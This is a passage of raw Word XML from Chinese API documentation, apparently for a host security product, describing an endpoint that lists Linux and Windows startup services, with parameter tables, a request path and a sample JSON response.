              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B02359B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6ECF3CF1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="33719E70" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AFDDB1B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47CB43B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BF1CA6D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65EF969B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>启动项名（模糊查询）（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>启动项名）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="422B154D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28D7F845" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>initLevel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="005C30C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Interger</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BC82798" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78A3E23C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>默认启动模式(仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> ）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6D20A73E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09DD0E68" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>defaultOpen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="007E60AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>布尔数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B4FD632" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10D8ED9F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>默认模式启用状态（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="73B2B154" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18BCD9BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>isXinetd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FFA1296" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>布尔数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57A7BFAF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59718972" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>启动方式 （仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3712B008" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2949D855" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>showName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10FCEF40" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="527330D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28253944" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>启动项名（仅windows）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0F2B430F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62F803F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FBBF0A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="480BB758" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="048576CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>服务启动用户windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2427D394" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09B84CDA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>enable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E68F5B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BA7B2B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B7F0D24" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>服务的状态windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="336A4BF1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26ECA2C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>startType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F2D166A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FC1B8D9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25DD3C98" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>启动类型windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0D9C6B3F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FF02349" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>publisher</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A866CFB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="620F9B45" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BC487DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>发布者windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44CB1A71" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC230A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/service/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3AD04038" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623C72DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "fe107d9c77f4c77a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.244",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "12345",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签a"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>initLevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 5,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NetworkManager</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>defaultOpen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "rc0": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "rc1": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "rc2": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "rc3": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "rc4": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "rc5": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "rc6": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "rc7": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xinetd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "type": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "user": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "enable": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>startType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "publisher": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440F9646"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452"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="2498"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="536F338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504DD4A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46AA1BE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06FD335B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AA7D3A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="17B3C62F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C1808DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71193C82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70333DD6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78D82942" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">agent </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="78783F92" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66C6C0A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71D8CC3C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="251FFB48" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56F7B8C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="14E42D09" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="382BB45B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FB2EBAF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E08969B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A867FDD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6CF196E0" w14:textId="77777777" w:rsidTr="005C4BFD">
